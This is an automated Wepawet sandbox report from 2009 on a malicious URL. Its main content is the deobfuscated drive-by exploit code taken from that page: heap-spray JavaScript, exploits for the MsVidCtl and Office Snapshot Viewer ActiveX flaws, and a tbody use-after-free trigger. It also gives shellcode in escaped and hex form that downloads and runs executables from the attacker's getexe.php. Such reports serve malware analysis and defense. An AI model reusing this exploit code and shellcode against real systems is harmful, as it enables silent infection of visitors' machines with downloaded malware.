Wepawet » JavaScript Report for http://silver-metscorp.com/1/index.php?spl=1

Analysis report for http://silver-metscorp.com/1/index.php?spl=1

Sample Overview

URL	http://silver-metscorp.com/1/index.php?spl=1
MD5	82a91eddef1b51feccdad3ec4e005f9a
Analysis Started	2009-09-03 10:56:14
Report Generated	2009-09-03 10:56:38
Jsand version	1.03.02

See the report for domain silver-metscorp.com.

Detection results

Detector	Result
Jsand 1.03.02	malicious

Exploits

Name	Description	Reference
Office Snapshot Viewer	The Microsoft Office Snapshot Viewer ActiveX control allows remote attackers to download arbitrary files to a client machine	CVE-2008-2463
MsVidCtl Overflow	Overflow in Microsoft Video ActiveX Control via specially-crafted data parameter	CVE-2008-0015

Deobfuscation results

Evals

No evals.

Writes

```
<script>
```
(repeated 4 times)

function ttRDNIoIn4yEo0i(){
  try {
    var KatIiicvbWTZd3V = document.createElement("object");
    KatIiicvbWTZd3V.setAttribute("id", "KatIiicvbWTZd3V");
    KatIiicvbWTZd3V.setAttribute("classid", "clsid:CA8A9780-280D-11CF-A24D-444553540000");
    var kkOeymxm5kq4yeC = KatIiicvbWTZd3V.GetVersions();
    kkOeymxm5kq4yeC = kkOeymxm5kq4yeC.split(",");
    kkOeymxm5kq4yeC = kkOeymxm5kq4yeC[4].split("=");
    kkOeymxm5kq4yeC = kkOeymxm5kq4yeC[1];
    zWmapVJRRvyuUcx = kkOeymxm5kq4yeC.split(".");
    zWmapVJRRvyuUcx = zWmapVJRRvyuUcx[0];
    if ((zWmapVJRRvyuUcx <= 9) && (zWmapVJRRvyuUcx >= 6)){
      document.write("
<iframe src=\"http://silver-metscorp.com/1/pdf.php?spl=pdf_ie2\" width=\"89\" height=\"108
\" frameborder=\"0\"></iframe>");
    }
  }
  catch (e){
  }
}
setTimeout("ttRDNIoIn4yEo0i();", 300);

(repeated 1 time)

```
</script>
```
(repeated 4 times)

<iframe src="http://silver-metscorp.com/1/pdf.php?spl=pdf_ie2" width="89" height="108" frameborder=
"0"></iframe>

(repeated 1 time)

document.write("<div id=\"QkJlOPI\">");
var Wc4NBot = "
%uA164%u0018%u0000%u408B%u8B30%u5440%u408B%u8B04%u0440%u408B%u0D04%u0020%u0020%u7C3D%u7700
%u7400%uC301%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40
%u588B%u6A3C%u5A4E%uE2D1%uE22B%uEC8B%u45C7%u6E10%u652E%uC778%u1445%u01FF%u0000%u45C7%u0000
%u0000%uEB00%u5A4F%u8352%u56EA%u5589%u5618%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303
%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575
%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u571C%uB852
%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u458B%uAB10%u9866%uAB66%uC033%u61B8%u0064
%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8318%u0CC4%uB050%u8A6C
%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u1855%uC483%u930C%u3350%u50C0
%u5650%u558B%u0318%u1455%u5052%u36B8%u2F1A%uFF70%u1855%u835B%u007D%u0F01%u9E85%u0000%u6A00
%u6800%u0080%u0000%u036A%u006A%u036A%u0068%u0000%u56C0%uA5B8%u0017%uFF7C%u1855%u4589%u6A04
%u6804%u1000%u0000%u0068%u0800%u6A00%uB800%uCA54%u91AF%u55FF%u8918%u0C45%u6A50%u8D00%u084D
%u6851%u0000%u0008%uFF50%u0475%u16B8%uFA65%uFF10%u1855%u8B5F%u8317%u04C7%u4D8B%u8308%u04E9
%uA7E8%u0000%u6A00%u6A00%u6A00%uFF00%u0475%uACB8%uDA08%uFF76%u1855%u006A%u4D8D%u5108%u75FF
%uFF08%u0C75%u0483%u0424%u75FF%uB804%u791F%uE80A%u55FF%uFF18%u0475%uFBB8%uFD97%uFF0F%u1855
%u45C7%u0200%u0000%u5700%uB856%uFE98%u0E8A%u55FF%uEB18%u182A%uF92A%uD2B7%uB377%u4501%u928A
%uADB7%u5D50%u67E4%uE6F5%u1AC7%uABBF%u101E%u7642%uA1A2%u6354%u7B09%uB089%u97F4%u734E%u3F93
%u83F1%u007D%u7402%uC760%u0045%u0001%u0000%u45C7%u7910%u652E%uC778%u1445%u0172%u0000%u7D8B
%u0318%u147D%u26B9%u0000%u8B00%uFC57%u05E8%u0000%uE900%uFE7C%uFFFF%uC033%u078A%uC8D2%uC132
%uD0F6%uC532%uC232%uC632%uC0D2%uC102%uC502%uC202%uC602%uC8D2%uC12A%uC52A%uD0F6%uC22A%uC62A
%uC0D2%uC2D3%uCA0F%u0788%u4947%uCE75%uC3C3%u7468%u7074%u2F3A%u732F%u6C69%u6576%u2D72%u656D
%u7374%u6F63%u7072%u632E%u6D6F%u312F%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6944
%u6572%u7463%u5F58%u5344";
var VGkmfi9 = unescape(Wc4NBot);
var rFajaA1 = unescape("%u9" + "090%u9" + "09" + "0");
var vCoqwv3 = 20;
var EHmpupC = vCoqwv3 + VGkmfi9.length;
while (rFajaA1.length < EHmpupC)rFajaA1 += rFajaA1;
var ee7WvrJ = rFajaA1.substring(0, EHmpupC);
var VZS1p3j = rFajaA1.substring(0, rFajaA1.length - EHmpupC);
while (VZS1p3j.length + EHmpupC < 0x40000)VZS1p3j = VZS1p3j + VZS1p3j + ee7WvrJ;
var TDjGPY7 = new Array();
for (jT9Hlu7 = 0; jT9Hlu7 < 350; jT9Hlu7 ++ ){
  TDjGPY7[jT9Hlu7] = VZS1p3j + VGkmfi9
}
var iGbuq4u = document.createElement('object');
QkJlOPI.appendChild(iGbuq4u);
iGbuq4u.width = '1';
iGbuq4u.height = '1';
iGbuq4u.data = 'dx_ds.gif';
iGbuq4u.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

(repeated 1 time)

```
<div id="QkJlOPI">
```
(repeated 1 time)

function mDwSiZFeOx2tpnX(){
  var wrdvlRgFL0VYC3z = "http://silver-metscorp.com/1/getexe.php?spl=Snapshot";
  var NZCr3uRHZpEai5O;
  var MnFtj2LQHgamFmo;
  var uiOQaQL2huqwVZ2 = new Array();
  uiOQaQL2huqwVZ2[0] = "c:/Program Files/Outlook Express/WAB.EXE";
  uiOQaQL2huqwVZ2[1] = "d:/Program Files/Outlook Express/WAB.EXE";
  uiOQaQL2huqwVZ2[2] = "e:/Program Files/Outlook Express/WAB.EXE";
  var Dpp0jYB5zSlZF1M = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
  if (Dpp0jYB5zSlZF1M){
    setTimeout('window.location = "ldap://"', 3000);
    for (NZCr3uRHZpEai5Oin uiOQaQL2huqwVZ2){
      MnFtj2LQHgamFmo = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
      var dF5Sfet2gbwXXS7 = wrdvlRgFL0VYC3z;
      var uMwNVfwhjwAUWPV = uiOQaQL2huqwVZ2[NZCr3uRHZpEai5O];
      MnFtj2LQHgamFmo.Zoom = 0;
      MnFtj2LQHgamFmo.ShowNavigationButtons = false;
      MnFtj2LQHgamFmo.AllowContextMenu = false;
      MnFtj2LQHgamFmo.SnapshotPath = dF5Sfet2gbwXXS7;
      try {
        MnFtj2LQHgamFmo.CompressedPath = uMwNVfwhjwAUWPV;
        MnFtj2LQHgamFmo.PrintSnapshot();
      }
      catch (e){
      }
    }
  }
}
mDwSiZFeOx2tpnX();

(repeated 1 time)

var JNs2feGvIMOLw6f = unescape("
%uA164%u0018%u0000%u408B%u8B30%u5440%u408B%u8B04%u0440%u408B%u0D04%u0020%u0020%u7C3D%u7700
%u7400%uC301%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40
%u588B%u6A3C%u5A4E%uE2D1%uE22B%uEC8B%u45C7%u6E10%u652E%uC778%u1445%u01FF%u0000%u45C7%u0000
%u0000%uEB00%u5A4F%u8352%u56EA%u5589%u5618%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303
%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575
%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u571C%uB852
%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u458B%uAB10%u9866%uAB66%uC033%u61B8%u0064
%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8318%u0CC4%uB050%u8A6C
%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u1855%uC483%u930C%u3350%u50C0
%u5650%u558B%u0318%u1455%u5052%u36B8%u2F1A%uFF70%u1855%u835B%u007D%u0F01%u9E85%u0000%u6A00
%u6800%u0080%u0000%u036A%u006A%u036A%u0068%u0000%u56C0%uA5B8%u0017%uFF7C%u1855%u4589%u6A04
%u6804%u1000%u0000%u0068%u0800%u6A00%uB800%uCA54%u91AF%u55FF%u8918%u0C45%u6A50%u8D00%u084D
%u6851%u0000%u0008%uFF50%u0475%u16B8%uFA65%uFF10%u1855%u8B5F%u8317%u04C7%u4D8B%u8308%u04E9
%uA7E8%u0000%u6A00%u6A00%u6A00%uFF00%u0475%uACB8%uDA08%uFF76%u1855%u006A%u4D8D%u5108%u75FF
%uFF08%u0C75%u0483%u0424%u75FF%uB804%u791F%uE80A%u55FF%uFF18%u0475%uFBB8%uFD97%uFF0F%u1855
%u45C7%u0200%u0000%u5700%uB856%uFE98%u0E8A%u55FF%uEB18%u182A%uF92A%uD2B7%uB377%u4501%u928A
%uADB7%u5D50%u67E4%uE6F5%u1AC7%uABBF%u101E%u7642%uA1A2%u6354%u7B09%uB089%u97F4%u734E%u3F93
%u83F1%u007D%u7402%uC760%u0045%u0001%u0000%u45C7%u7910%u652E%uC778%u1445%u0172%u0000%u7D8B
%u0318%u147D%u26B9%u0000%u8B00%uFC57%u05E8%u0000%uE900%uFE7C%uFFFF%uC033%u078A%uC8D2%uC132
%uD0F6%uC532%uC232%uC632%uC0D2%uC102%uC502%uC202%uC602%uC8D2%uC12A%uC52A%uD0F6%uC22A%uC62A
%uC0D2%uC2D3%uCA0F%u0788%u4947%uCE75%uC3C3%u7468%u7074%u2F3A%u732F%u6C69%u6576%u2D72%u656D
%u7374%u6F63%u7072%u632E%u6D6F%u312F%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u656D
%u5F6D%u6F63%u0072");
var GmesdME6QSX4RJZ = new Array();
var x5wz7ceMXwivIf2 = 0x100000 - (JNs2feGvIMOLw6f.length * 2 + 0x01020);
var EzSyyYbdv9ae5sJ = unescape("%u0C0C%u0C0C");
while (EzSyyYbdv9ae5sJ.length < x5wz7ceMXwivIf2 / 2){
  EzSyyYbdv9ae5sJ += EzSyyYbdv9ae5sJ;
}
var BqocjRyyXPQ5SsN = EzSyyYbdv9ae5sJ.substring(0, x5wz7ceMXwivIf2 / 2);
deleteEzSyyYbdv9ae5sJ;
for (QpAtRtKQrrqIwJA = 0; QpAtRtKQrrqIwJA < 0xC0; QpAtRtKQrrqIwJA ++ ){
  GmesdME6QSX4RJZ[QpAtRtKQrrqIwJA] = BqocjRyyXPQ5SsN + JNs2feGvIMOLw6f;
}
CollectGarbage();
var ML0mJ9LulH4Lv8E = unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var fC4O7VHQv0ImRE6 = new Array();
for (var qZg6sDFg2pQzhwO = 0; qZg6sDFg2pQzhwO < 1000; qZg6sDFg2pQzhwO ++ )fC4O7VHQv0ImRE6.
push(document.createElement("img"));
function B1f3l1mfhSKfBKY(){
  MYQkLktgfeyj1tq = document.createElement("tbody");
  MYQkLktgfeyj1tq.click;
  var f84IW0noajxsWP7 = MYQkLktgfeyj1tq.cloneNode();
  MYQkLktgfeyj1tq.clearAttributes();
  MYQkLktgfeyj1tq = null;
  CollectGarbage();
  for (var qZg6sDFg2pQzhwO = 0; qZg6sDFg2pQzhwO < fC4O7VHQv0ImRE6.length; qZg6sDFg2pQzhwO
   ++ )fC4O7VHQv0ImRE6[qZg6sDFg2pQzhwO].src = ML0mJ9LulH4Lv8E;
  f84IW0noajxsWP7.click;
}
window.setTimeout("B1f3l1mfhSKfBKY();", 500);

(repeated 1 time)

Network Activity

Requests

URL	Status	Content Type
http://silver-metscorp.com/1/index.php?spl=1	200	text/html
http://silver-metscorp.com/1/index.php?spl=2	200	text/html
http://silver-metscorp.com/1/index.php?spl=3	200	text/html
http://silver-metscorp.com/1/index.php?spl=4	200	text/html

Redirects

No redirects.

ActiveX controls

CA8A9780-280D-11CF-A24D-444553540000
	Name	Count
Methods	GetVersions	1
	Name	Value	Count
Attributes	id	KatIiicvbWTZd3V	1

0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
	Name	Value	Count
Attributes	width	1	1
	data	dx_ds.gif	1
	height	1	1

snpvw.Snapshot Viewer Control.1
	Name	Count
Methods	PrintSnapshot	3
	Name	Value	Count
Attributes	ShowNavigationButtons	false	3
	Zoom	0.0	3
	CompressedPath	e:/Program Files/Outlook Express/WAB.EXE	1
		d:/Program Files/Outlook Express/WAB.EXE	1
		c:/Program Files/Outlook Express/WAB.EXE	1
	AllowContextMenu	false	3
	SnapshotPath	http://silver-metscorp.com/1/getexe.php?spl=Snapshot	3

clsid:ca8a9780-280d-11cf-a24d-444553540000

Name Count

Methods GetVersions 1

clsid:ca8a9780-280d-11cf-a24d-444553540000
	Name	Count
Methods	GetVersions	1

Shellcode and Malware

Hexadecimal	ASCII
64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 4e 5a d1 e2 2b e2 8b ec c7 45 10 6e 2e 65 78 c7 45 14 ff 01 00 00 c7 45 00 00 00 00 00 eb 4f 5a 52 83 ea 56 89 55 18 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 1c 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f 8b 45 10 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 18 83 c4 0c 50 b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 18 83 c4 0c 93 50 33 c0 50 50 56 8b 55 18 03 55 14 52 50 b8 36 1a 2f 70 ff 55 18 5b 83 7d 00 01 0f 85 9e 00 00 00 6a 00 68 80 00 00 00 6a 03 6a 00 6a 03 68 00 00 00 c0 56 b8 a5 17 00 7c ff 55 18 89 45 04 6a 04 68 00 10 00 00 68 00 00 08 00 6a 00 b8 54 ca af 91 ff 55 18 89 45 0c 50 6a 00 8d 4d 08 51 68 00 00 08 00 50 ff 75 04 b8 16 65 fa 10 ff 55 18 5f 8b 17 83 c7 04 8b 4d 08 83 e9 04 e8 a7 00 00 00 6a 00 6a 00 6a 00 ff 75 04 b8 ac 08 da 76 ff 55 18 6a 00 8d 4d 08 51 ff 75 08 ff 75 0c 83 04 24 04 ff 75 04 b8 1f 79 0a e8 ff 55 18 ff 75 04 b8 fb 97 fd 0f ff 55 18 c7 45 00 02 00 00 00 57 56 b8 98 fe 8a 0e ff 55 18 eb 2a 18 2a f9 b7 d2 77 b3 01 45 8a 92 b7 ad 50 5d e4 67 f5 e6 c7 1a bf ab 1e 10 42 76 a2 a1 54 63 09 7b 89 b0 f4 97 4e 73 93 3f f1 83 7d 00 02 74 60 c7 45 00 01 00 00 00 c7 45 10 79 2e 65 78 c7 45 14 72 01 00 00 8b 7d 18 03 7d 14 b9 26 00 00 00 8b 57 fc e8 05 00 00 00 e9 7c fe ff ff 33 c0 8a 07 d2 c8 32 c1 f6 d0 32 c5 32 c2 32 c6 d2 c0 02 c1 02 c5 02 c2 02 c6 d2 c8 2a c1 2a c5 f6 d0 2a c2 2a c6 d2 c0 d3 c2 0f ca 88 07 47 49 75 ce c3 c3 68 74 74 70 3a 2f 2f 73 69 6c 76 65 72 2d 6d 65 74 73 63 6f 72 70 2e 63 6f 6d 2f 31 2f 67 65 74 65 78 65 2e 70 68 70 3f 73 70 6c 3d 44 69 72 65 63 74 58 5f 44 53	d......@0.@T.@.. @..@.. . .=\|.w.t ..3.d.@0x..@..p. ..X....@4.@\|.X<j NZ..+....E.n.ex. E......E......OZ R..V.U.VW.s<.t3x ..V.v ..3.IPA.3. 6....8.t......@. .X;.u.^.F$..f..H .V........_^P..} .WR.3..[.....2.. ...O.E..f.f.3..a d..PhThre5$.itPT S....\|.U....P.l. ..Phon.dhurlmT.. N...U.....P3.PPV .U..U.RP.6./p.U. [.}........j.h.. ..j.j.j.h....V.. ..\|.U..E.j.h.... h....j..T....U.. E.Pj..M.Qh....P. u...e...U._..... .M.........j.j.j ..u.....v.U.j..M .Q.u..u...$..u.. .y...U..u....... U..E.....WV..... .U......w..E.. ..P].g........Bv ..Tc.{....Ns.?.. }..t`.E......E.y .ex.E.r....}..}. .&....W.......\|. ..3.....2...2.2. 2.............. ............. GIu...http://sil ver-metscorp.com /1/getexe.php?sp l=DirectX_DS
64 a1 18 00 00 00 8b 40 30 8b 40 54 8b 40 04 8b 40 04 8b 40 04 0d 20 00 20 00 3d 7c 00 77 00 74 01 c3 33 c0 64 8b 40 30 78 0c 8b 40 0c 8b 70 1c ad 8b 58 08 eb 09 8b 40 34 8d 40 7c 8b 58 3c 6a 4e 5a d1 e2 2b e2 8b ec c7 45 10 6e 2e 65 78 c7 45 14 ff 01 00 00 c7 45 00 00 00 00 00 eb 4f 5a 52 83 ea 56 89 55 18 56 57 8b 73 3c 8b 74 33 78 03 f3 56 8b 76 20 03 f3 33 c9 49 50 41 ad 33 ff 36 0f be 14 03 38 f2 74 08 c1 cf 0d 03 fa 40 eb ef 58 3b f8 75 e5 5e 8b 46 24 03 c3 66 8b 0c 48 8b 56 1c 03 d3 8b 04 8a 03 c3 5f 5e 50 c3 8d 7d 1c 57 52 b8 33 ca 8a 5b e8 a2 ff ff ff 32 c0 8b f7 f2 ae 4f 8b 45 10 ab 66 98 66 ab 33 c0 b8 61 64 00 00 50 68 54 68 72 65 35 24 1c 69 74 50 54 53 b8 aa fc 0d 7c ff 55 18 83 c4 0c 50 b0 6c 8a e0 98 50 68 6f 6e 2e 64 68 75 72 6c 6d 54 b8 8e 4e 0e ec ff 55 18 83 c4 0c 93 50 33 c0 50 50 56 8b 55 18 03 55 14 52 50 b8 36 1a 2f 70 ff 55 18 5b 83 7d 00 01 0f 85 9e 00 00 00 6a 00 68 80 00 00 00 6a 03 6a 00 6a 03 68 00 00 00 c0 56 b8 a5 17 00 7c ff 55 18 89 45 04 6a 04 68 00 10 00 00 68 00 00 08 00 6a 00 b8 54 ca af 91 ff 55 18 89 45 0c 50 6a 00 8d 4d 08 51 68 00 00 08 00 50 ff 75 04 b8 16 65 fa 10 ff 55 18 5f 8b 17 83 c7 04 8b 4d 08 83 e9 04 e8 a7 00 00 00 6a 00 6a 00 6a 00 ff 75 04 b8 ac 08 da 76 ff 55 18 6a 00 8d 4d 08 51 ff 75 08 ff 75 0c 83 04 24 04 ff 75 04 b8 1f 79 0a e8 ff 55 18 ff 75 04 b8 fb 97 fd 0f ff 55 18 c7 45 00 02 00 00 00 57 56 b8 98 fe 8a 0e ff 55 18 eb 2a 18 2a f9 b7 d2 77 b3 01 45 8a 92 b7 ad 50 5d e4 67 f5 e6 c7 1a bf ab 1e 10 42 76 a2 a1 54 63 09 7b 89 b0 f4 97 4e 73 93 3f f1 83 7d 00 02 74 60 c7 45 00 01 00 00 00 c7 45 10 79 2e 65 78 c7 45 14 72 01 00 00 8b 7d 18 03 7d 14 b9 26 00 00 00 8b 57 fc e8 05 00 00 00 e9 7c fe ff ff 33 c0 8a 07 d2 c8 32 c1 f6 d0 32 c5 32 c2 32 c6 d2 c0 02 c1 02 c5 02 c2 02 c6 d2 c8 2a c1 2a c5 f6 d0 2a c2 2a c6 d2 c0 d3 c2 0f ca 88 07 47 49 75 ce c3 c3 68 74 74 70 3a 2f 2f 73 69 6c 76 65 72 2d 6d 65 74 73 63 6f 72 70 2e 63 6f 6d 2f 31 2f 67 65 74 65 78 65 2e 70 68 70 3f 73 70 6c 3d 6d 65 6d 5f 63 6f 72 00	d......@0.@T.@.. @..@.. . .=\|.w.t ..3.d.@0x..@..p. ..X....@4.@\|.X<j NZ..+....E.n.ex. E......E......OZ R..V.U.VW.s<.t3x ..V.v ..3.IPA.3. 6....8.t......@. .X;.u.^.F$..f..H .V........_^P..} .WR.3..[.....2.. ...O.E..f.f.3..a d..PhThre5$.itPT S....\|.U....P.l. ..Phon.dhurlmT.. N...U.....P3.PPV .U..U.RP.6./p.U. [.}........j.h.. ..j.j.j.h....V.. ..\|.U..E.j.h.... h....j..T....U.. E.Pj..M.Qh....P. u...e...U._..... .M.........j.j.j ..u.....v.U.j..M .Q.u..u...$..u.. .y...U..u....... U..E.....WV..... .U......w..E.. ..P].g........Bv ..Tc.{....Ns.?.. }..t`.E......E.y .ex.E.r....}..}. .&....W.......\|. ..3.....2...2.2. 2.............. ............. GIu...http://sil ver-metscorp.com /1/getexe.php?sp l=mem_cor.

Hexadecimal

ASCII

64 a1 18 00 00 00 8b 40  30 8b 40 54 8b 40 04 8b 
40 04 8b 40 04 0d 20 00  20 00 3d 7c 00 77 00 74 
01 c3 33 c0 64 8b 40 30  78 0c 8b 40 0c 8b 70 1c 
ad 8b 58 08 eb 09 8b 40  34 8d 40 7c 8b 58 3c 6a 
4e 5a d1 e2 2b e2 8b ec  c7 45 10 6e 2e 65 78 c7 
45 14 ff 01 00 00 c7 45  00 00 00 00 00 eb 4f 5a 
52 83 ea 56 89 55 18 56  57 8b 73 3c 8b 74 33 78 
03 f3 56 8b 76 20 03 f3  33 c9 49 50 41 ad 33 ff 
36 0f be 14 03 38 f2 74  08 c1 cf 0d 03 fa 40 eb 
ef 58 3b f8 75 e5 5e 8b  46 24 03 c3 66 8b 0c 48 
8b 56 1c 03 d3 8b 04 8a  03 c3 5f 5e 50 c3 8d 7d 
1c 57 52 b8 33 ca 8a 5b  e8 a2 ff ff ff 32 c0 8b 
f7 f2 ae 4f 8b 45 10 ab  66 98 66 ab 33 c0 b8 61 
64 00 00 50 68 54 68 72  65 35 24 1c 69 74 50 54 
53 b8 aa fc 0d 7c ff 55  18 83 c4 0c 50 b0 6c 8a 
e0 98 50 68 6f 6e 2e 64  68 75 72 6c 6d 54 b8 8e 
4e 0e ec ff 55 18 83 c4  0c 93 50 33 c0 50 50 56 
8b 55 18 03 55 14 52 50  b8 36 1a 2f 70 ff 55 18 
5b 83 7d 00 01 0f 85 9e  00 00 00 6a 00 68 80 00 
00 00 6a 03 6a 00 6a 03  68 00 00 00 c0 56 b8 a5 
17 00 7c ff 55 18 89 45  04 6a 04 68 00 10 00 00 
68 00 00 08 00 6a 00 b8  54 ca af 91 ff 55 18 89 
45 0c 50 6a 00 8d 4d 08  51 68 00 00 08 00 50 ff 
75 04 b8 16 65 fa 10 ff  55 18 5f 8b 17 83 c7 04 
8b 4d 08 83 e9 04 e8 a7  00 00 00 6a 00 6a 00 6a 
00 ff 75 04 b8 ac 08 da  76 ff 55 18 6a 00 8d 4d 
08 51 ff 75 08 ff 75 0c  83 04 24 04 ff 75 04 b8 
1f 79 0a e8 ff 55 18 ff  75 04 b8 fb 97 fd 0f ff 
55 18 c7 45 00 02 00 00  00 57 56 b8 98 fe 8a 0e 
ff 55 18 eb 2a 18 2a f9  b7 d2 77 b3 01 45 8a 92 
b7 ad 50 5d e4 67 f5 e6  c7 1a bf ab 1e 10 42 76 
a2 a1 54 63 09 7b 89 b0  f4 97 4e 73 93 3f f1 83 
7d 00 02 74 60 c7 45 00  01 00 00 00 c7 45 10 79 
2e 65 78 c7 45 14 72 01  00 00 8b 7d 18 03 7d 14 
b9 26 00 00 00 8b 57 fc  e8 05 00 00 00 e9 7c fe 
ff ff 33 c0 8a 07 d2 c8  32 c1 f6 d0 32 c5 32 c2 
32 c6 d2 c0 02 c1 02 c5  02 c2 02 c6 d2 c8 2a c1 
2a c5 f6 d0 2a c2 2a c6  d2 c0 d3 c2 0f ca 88 07 
47 49 75 ce c3 c3 68 74  74 70 3a 2f 2f 73 69 6c 
76 65 72 2d 6d 65 74 73  63 6f 72 70 2e 63 6f 6d 
2f 31 2f 67 65 74 65 78  65 2e 70 68 70 3f 73 70 
6c 3d 44 69 72 65 63 74  58 5f 44 53

d......@0.@T.@..
@..@.. . .=|.w.t
..3.d.@0x..@..p.
..X....@4.@|.X<j
NZ..+....E.n.ex.
E......E......OZ
R..V.U.VW.s<.t3x
..V.v ..3.IPA.3.
6....8.t......@.
.X;.u.^.F$..f..H
.V........_^P..}
.WR.3..[.....2..
...O.E..f.f.3..a
d..PhThre5$.itPT
S....|.U....P.l.
..Phon.dhurlmT..
N...U.....P3.PPV
.U..U.RP.6./p.U.
[.}........j.h..
..j.j.j.h....V..
..|.U..E.j.h....
h....j..T....U..
E.Pj..M.Qh....P.
u...e...U._.....
.M.........j.j.j
..u.....v.U.j..M
.Q.u..u...$..u..
.y...U..u.......
U..E.....WV.....
.U..*.*...w..E..
..P].g........Bv
..Tc.{....Ns.?..
}..t`.E......E.y
.ex.E.r....}..}.
.&....W.......|.
..3.....2...2.2.
2.............*.
*...*.*.........
GIu...http://sil
ver-metscorp.com
/1/getexe.php?sp
l=DirectX_DS

64 a1 18 00 00 00 8b 40  30 8b 40 54 8b 40 04 8b 
40 04 8b 40 04 0d 20 00  20 00 3d 7c 00 77 00 74 
01 c3 33 c0 64 8b 40 30  78 0c 8b 40 0c 8b 70 1c 
ad 8b 58 08 eb 09 8b 40  34 8d 40 7c 8b 58 3c 6a 
4e 5a d1 e2 2b e2 8b ec  c7 45 10 6e 2e 65 78 c7 
45 14 ff 01 00 00 c7 45  00 00 00 00 00 eb 4f 5a 
52 83 ea 56 89 55 18 56  57 8b 73 3c 8b 74 33 78 
03 f3 56 8b 76 20 03 f3  33 c9 49 50 41 ad 33 ff 
36 0f be 14 03 38 f2 74  08 c1 cf 0d 03 fa 40 eb 
ef 58 3b f8 75 e5 5e 8b  46 24 03 c3 66 8b 0c 48 
8b 56 1c 03 d3 8b 04 8a  03 c3 5f 5e 50 c3 8d 7d 
1c 57 52 b8 33 ca 8a 5b  e8 a2 ff ff ff 32 c0 8b 
f7 f2 ae 4f 8b 45 10 ab  66 98 66 ab 33 c0 b8 61 
64 00 00 50 68 54 68 72  65 35 24 1c 69 74 50 54 
53 b8 aa fc 0d 7c ff 55  18 83 c4 0c 50 b0 6c 8a 
e0 98 50 68 6f 6e 2e 64  68 75 72 6c 6d 54 b8 8e 
4e 0e ec ff 55 18 83 c4  0c 93 50 33 c0 50 50 56 
8b 55 18 03 55 14 52 50  b8 36 1a 2f 70 ff 55 18 
5b 83 7d 00 01 0f 85 9e  00 00 00 6a 00 68 80 00 
00 00 6a 03 6a 00 6a 03  68 00 00 00 c0 56 b8 a5 
17 00 7c ff 55 18 89 45  04 6a 04 68 00 10 00 00 
68 00 00 08 00 6a 00 b8  54 ca af 91 ff 55 18 89 
45 0c 50 6a 00 8d 4d 08  51 68 00 00 08 00 50 ff 
75 04 b8 16 65 fa 10 ff  55 18 5f 8b 17 83 c7 04 
8b 4d 08 83 e9 04 e8 a7  00 00 00 6a 00 6a 00 6a 
00 ff 75 04 b8 ac 08 da  76 ff 55 18 6a 00 8d 4d 
08 51 ff 75 08 ff 75 0c  83 04 24 04 ff 75 04 b8 
1f 79 0a e8 ff 55 18 ff  75 04 b8 fb 97 fd 0f ff 
55 18 c7 45 00 02 00 00  00 57 56 b8 98 fe 8a 0e 
ff 55 18 eb 2a 18 2a f9  b7 d2 77 b3 01 45 8a 92 
b7 ad 50 5d e4 67 f5 e6  c7 1a bf ab 1e 10 42 76 
a2 a1 54 63 09 7b 89 b0  f4 97 4e 73 93 3f f1 83 
7d 00 02 74 60 c7 45 00  01 00 00 00 c7 45 10 79 
2e 65 78 c7 45 14 72 01  00 00 8b 7d 18 03 7d 14 
b9 26 00 00 00 8b 57 fc  e8 05 00 00 00 e9 7c fe 
ff ff 33 c0 8a 07 d2 c8  32 c1 f6 d0 32 c5 32 c2 
32 c6 d2 c0 02 c1 02 c5  02 c2 02 c6 d2 c8 2a c1 
2a c5 f6 d0 2a c2 2a c6  d2 c0 d3 c2 0f ca 88 07 
47 49 75 ce c3 c3 68 74  74 70 3a 2f 2f 73 69 6c 
76 65 72 2d 6d 65 74 73  63 6f 72 70 2e 63 6f 6d 
2f 31 2f 67 65 74 65 78  65 2e 70 68 70 3f 73 70 
6c 3d 6d 65 6d 5f 63 6f  72 00

d......@0.@T.@..
@..@.. . .=|.w.t
